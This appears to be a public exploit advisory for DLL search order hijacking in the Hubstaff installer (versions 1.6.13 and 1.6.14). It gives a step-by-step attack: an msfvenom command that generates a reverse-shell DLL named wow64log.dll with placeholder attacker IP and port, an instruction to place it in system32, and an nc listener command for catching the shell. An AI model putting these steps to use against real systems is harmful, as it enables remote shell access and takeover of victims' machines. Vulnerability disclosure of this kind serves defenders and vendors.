Share
## https://sploitus.com/exploit?id=PACKETSTORM:172518
*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking  
*#Date:* 14/05/2023  
*#Exploit Author:* Ahsan Azad  
*#Vendor Homepage:* https://hubstaff.com/  
*#Software Link:* https://app.hubstaff.com/download  
*#Version:* 1.6.13, 1.6.14  
*#Tested On:* 64-bit operating system, x64-based processor  
  
*Description*  
Hubstaff is an employee work tracker with screenshots, timesheets, billing,  
in-depth reports, and more.  
  
During testing. It was found that the system32 subdirectory was missing a  
DLL library with the name *wow64log.dll* that had been required by the  
hubstaff's setup file during installation. Hence, using Metasploit's  
msfvenom to create a new wow64log.dll file, Tester was able to get a  
reverse shell locally.  
  
  
*Exploit*  
1- Generate a dll file with the name wow64log.dll using the command:  
  
*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll  
-o wow64log.dll*  
  
2- Place the newly generated DLL to the *system32 *directory.  
3- Start a listener on attacker's console using:  
  
*nc -lnvp <port_used_while_generating_DLL>*  
  
4- Launch the exe.  
  
Reverse shell will be receive as:  
  
  
*C:\Windows>*  
  
  
  
*Attachments (For the understanding of verification team)*  
1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]  
  
2.png - Showing how tester was able to generate a new dll using msfvenom on  
port 1337.  
[image: 2.png]  
  
3.png - Showing a reverse connection received on the attacker's console  
at C:\Windows> by launching the exe.[image: 3.png]